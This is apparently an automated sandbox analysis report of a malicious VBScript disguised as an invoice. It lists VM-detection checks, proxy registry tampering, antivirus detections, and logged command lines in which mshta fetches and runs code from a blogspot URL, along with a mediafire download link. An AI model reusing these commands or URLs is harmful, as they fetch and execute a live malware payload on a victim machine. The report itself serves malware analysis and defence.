lnvoice#20336 .vbs

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 9, 2023, 11:15 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Performs some HTTP requests (2 events)

request	GET https://htmmaincpla.blogspot.com/atom.xml
request	GET https://www.mediafire.com/file/uobbc8hga4065u7/MAINNODECPa.htm/file

Allocates read-write-execute memory (usually to unpack itself) (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 9, 2023, 11:15 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73162000 process_handle: 0xffffffff	1	0	0
NtProtectVirtualMemory Aug. 9, 2023, 11:15 a.m.	process_identifier: 2200 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72a83000 process_handle: 0xffffffff	1	0	0

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml
cmdline	mshta https://htmmaincpla.blogspot.com/atom.xml

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 9, 2023, 11:15 a.m.	show_type: 0 filepath_r: mshta parameters: https://htmmaincpla.blogspot.com/atom.xml filepath: mshta	1	1	0

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Aug. 9, 2023, 11:15 a.m.	key_handle: 0x000002dc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

File has been identified by 13 AntiVirus engines on VirusTotal as malicious (13 events)

ALYac	VB:Trojan.VBS.Agent.BTQ
VIPRE	VB:Trojan.VBS.Agent.BTQ
ESET-NOD32	VBS/Kryptik.TV
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	VB:Trojan.VBS.Agent.BTQ
MicroWorld-eScan	VB:Trojan.VBS.Agent.BTQ
Tencent	Script.Trojan.Generic.Ximw
Emsisoft	VB:Trojan.VBS.Agent.BTQ (B)
FireEye	VB:Trojan.VBS.Agent.BTQ
GData	VB:Trojan.VBS.Agent.BTQ
Arcabit	VB:Trojan.VBS.Agent.BTQ
ZoneAlarm	HEUR:Trojan.Script.Generic
MAX	malware (ai score=82)

Modifies proxy override settings possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Aug. 9, 2023, 11:15 a.m.	key_handle: 0x000002dc regkey_r: ProxyOverride reg_type: 1 (REG_SZ) value: 127.0.0.1:16107; regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride	1	0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\mshta.exe" https://htmmaincpla.blogspot.com/atom.xml
parent_process	wscript.exe				martian_process	mshta https://htmmaincpla.blogspot.com/atom.xml

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\mshta.exe